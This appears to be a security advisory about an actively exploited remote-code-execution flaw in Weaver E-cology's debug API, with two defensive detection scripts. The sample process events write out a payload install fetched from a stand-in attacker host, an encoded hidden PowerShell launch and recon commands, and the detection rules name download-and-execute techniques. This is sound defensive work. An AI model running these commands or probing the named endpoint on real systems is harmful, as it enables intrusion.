VYPR
patch · Published May 4, 2026 · Updated May 17, 2026 · 2 sources

Weaver E-cology RCE Flaw Under Active Exploitation via Debug API

A critical, actively exploited remote code execution vulnerability in the Weaver E-cology platform is allowing unauthenticated attackers to execute arbitrary commands via an exposed debug API.

A critical unauthenticated remote code execution (RCE) vulnerability in the Weaver E-cology enterprise office automation platform is currently being exploited in the wild. Tracked as CVE-2026-22679, the flaw carries a CVSS score of 9.8 and affects Weaver E-cology 10.0 versions released prior to March 12, 2026 (The Hacker News, BleepingComputer).

The vulnerability stems from an exposed debug API endpoint located at `/papi/esearch/data/devops/dubboApi/debug/method`. This endpoint improperly allows user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality without requiring authentication or input validation (BleepingComputer). By crafting POST requests with specific `interfaceName` and `methodName` parameters, an attacker can trigger command-execution helpers, effectively turning the debug interface into a remote command execution tool (The Hacker News).
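Because the endpoint requires no authentication, any request that reaches it is worth an alert. The script below is an added example written for this page, not a tool from Weaver or from either cited source: it scans reverse-proxy access logs for requests to the debug path and grades them by method and response status. It assumes the E-cology instance sits behind a proxy writing the Combined Log Format (nginx/Apache default); the sample log lines are constructed with TEST-NET addresses.

```python
import re
from dataclasses import dataclass
from typing import List

# Debug endpoint named in the advisory; Weaver build 20260312 removes it entirely.
DEBUG_ENDPOINT = "/papi/esearch/data/devops/dubboApi/debug/method"

# Assumption: the instance sits behind a reverse proxy writing the Combined Log Format
# (nginx/Apache default). Adapt LOG_RE if your access log uses another layout.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


@dataclass
class Finding:
    src: str
    ts: str
    method: str
    status: int
    severity: str


def normalize_path(target: str) -> str:
    """Strip the query string, collapse repeated slashes, drop a trailing slash, lower-case."""
    path = target.split("?", 1)[0]
    path = re.sub(r"/+", "/", path)
    return path.rstrip("/").lower()


def classify(method: str, status: int) -> str:
    """Severity for a request that targeted the debug endpoint."""
    if method == "POST" and status < 400:
        return "critical"   # server accepted the call: the endpoint is still present
    if method == "POST":
        return "high"       # rejected (e.g. 404 after patching) but someone is trying
    return "medium"         # GET/HEAD/OPTIONS reconnaissance of the endpoint


def scan_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per request whose path is the debug endpoint."""
    findings: List[Finding] = []
    target_norm = normalize_path(DEBUG_ENDPOINT)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log line; skip silently
        if normalize_path(m.group("target")) != target_norm:
            continue
        status = int(m.group("status"))
        findings.append(Finding(m.group("src"), m.group("ts"), m.group("method"),
                                status, classify(m.group("method"), status)))
    return findings


# Constructed sample log lines (TEST-NET addresses); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2026:08:14:02 +0000] "POST /papi/esearch/data/devops/dubboApi/debug/method HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [17/Mar/2026:08:13:55 +0000] "GET /papi/esearch/data/devops/dubboApi/debug/method HTTP/1.1" 405 0 "-" "curl/8.0"',
    '198.51.100.20 - - [17/Mar/2026:08:20:11 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Apr/2026:02:00:00 +0000] "POST //papi/esearch/data/devops//dubboApi/debug/method?x=1 HTTP/1.1" 404 153 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.severity:8} {f.ts} {f.src} {f.method} -> {f.status}")
```

A "critical" hit means the server answered a POST to the endpoint with a success code, which only happens on a build that still ships it; "high" hits on a patched build still identify sources worth blocking, since the actor was evidently working from the public exploit details.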

Vega Research Team identified active exploitation of this flaw beginning as early as March 17, 2026, just five days after the vendor released the necessary security patches (The Hacker News). The Shadowserver Foundation later confirmed signs of exploitation starting on March 31, 2026 (The Hacker News). While the platform is primarily utilized by organizations in China, the ease of access to the debug endpoint has made it a target for threat actors seeking to compromise internal business process management systems (BleepingComputer).

During the observed campaign, attackers attempted to verify RCE capabilities by triggering ping commands to external infrastructure before moving to payload delivery. The activity included failed attempts to deploy an MSI installer named "fanwei0324.msi" and repeated efforts to fetch obfuscated, fileless PowerShell scripts (BleepingComputer). Throughout the intrusion, attackers executed standard reconnaissance commands such as `whoami`, `ipconfig`, and `tasklist` (The Hacker News). Despite these efforts, researchers noted that the attackers failed to establish persistent sessions on the targeted hosts (BleepingComputer).
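The post-exploitation chain above (ping verification, MSI drop, fileless PowerShell, recon commands) is visible on the host as child processes of the web service. The following rule set is an added example for this page, not code from the cited researchers: it tags process-creation events whose parent is the E-cology service process. It assumes E-cology runs as a Java service on Windows (the advisory names the payload types but not the service process, so `SERVICE_PARENTS` is configurable); the events are constructed, with a TEST-NET address standing in for attacker infrastructure.

```python
import re
from typing import Dict, List, Tuple

# Assumption: E-cology runs as a Java service on Windows (the advisory describes MSI and
# PowerShell payloads but does not name the service process); adjust SERVICE_PARENTS.
SERVICE_PARENTS = {"java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Each rule is (tag, pattern applied to the child's command line). The recon command
# names, the MSI file name and the fileless-PowerShell stage come from the advisory.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("recon-command", re.compile(r"\b(whoami|ipconfig|tasklist)\b", re.I)),
    ("rce-verification-ping", re.compile(r"\bping(\.exe)?\b", re.I)),
    ("msi-payload-fetch", re.compile(r"msiexec.*\.msi", re.I)),
    ("fileless-powershell",
     re.compile(r"powershell.*(-enc\w*|-e\b|iex\b|invoke-expression|downloadstring)", re.I)),
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Tags for one process-creation event; an empty list means nothing to alert on."""
    if event["parent_image"].lower() not in SERVICE_PARENTS:
        return []                         # only children of the web service matter here
    tags = [tag for tag, rx in RULES if rx.search(event["cmdline"])]
    if not tags and event["image"].lower() in SHELLS:
        tags.append("shell-from-web-service")   # a web service rarely needs a shell at all
    return tags


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (timestamp, tags) for every event that produced at least one tag."""
    out: List[Tuple[str, List[str]]] = []
    for e in events:
        tags = evaluate(e)
        if tags:
            out.append((e["ts"], tags))
    return out


# Constructed process-creation events in the order the campaign was described.
SAMPLE_EVENTS = [
    {"ts": "2026-03-17T08:14:03Z", "host": "oa-app-01", "parent_image": "java.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2026-03-17T08:14:10Z", "host": "oa-app-01", "parent_image": "java.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c ping -n 1 203.0.113.50"},
    {"ts": "2026-03-17T08:15:02Z", "host": "oa-app-01", "parent_image": "java.exe",
     "image": "msiexec.exe", "cmdline": "msiexec /i http://203.0.113.50/fanwei0324.msi /q"},
    {"ts": "2026-03-17T08:16:40Z", "host": "oa-app-01", "parent_image": "java.exe",
     "image": "powershell.exe", "cmdline": "powershell -nop -w hidden -enc QQBBAEEAQQA="},
    {"ts": "2026-03-17T09:00:00Z", "host": "oa-app-01", "parent_image": "explorer.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},   # admin's interactive shell
    {"ts": "2026-03-17T09:05:00Z", "host": "oa-app-01", "parent_image": "java.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ts, tags in scan_events(SAMPLE_EVENTS):
        print(ts, ", ".join(tags))
```

The parent-process filter does the real work: the same `whoami` typed by an administrator in an interactive shell is ignored, while any shell spawned by the web service is flagged even when the command line matches none of the named patterns.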

Weaver has addressed the vulnerability in build 20260312, which completely removes the susceptible debug endpoint (BleepingComputer). There are no alternative mitigations or workarounds available, making an immediate upgrade to the latest version the only recommended course of action (BleepingComputer). Security researcher Kerem Oruc has released a Python-based detection script to help administrators identify whether their instances remain vulnerable (The Hacker News).

The exploitation of CVE-2026-22679 highlights the persistent risk posed by debug interfaces left enabled in production environments. Because these endpoints often bypass standard authentication mechanisms, they provide a direct path for attackers to gain system-level access. As threat actors continue to monitor for newly disclosed vulnerabilities, the window between patch release and active exploitation remains dangerously narrow, underscoring the necessity for rapid deployment of security updates in enterprise environments.

Synthesized by Vypr AI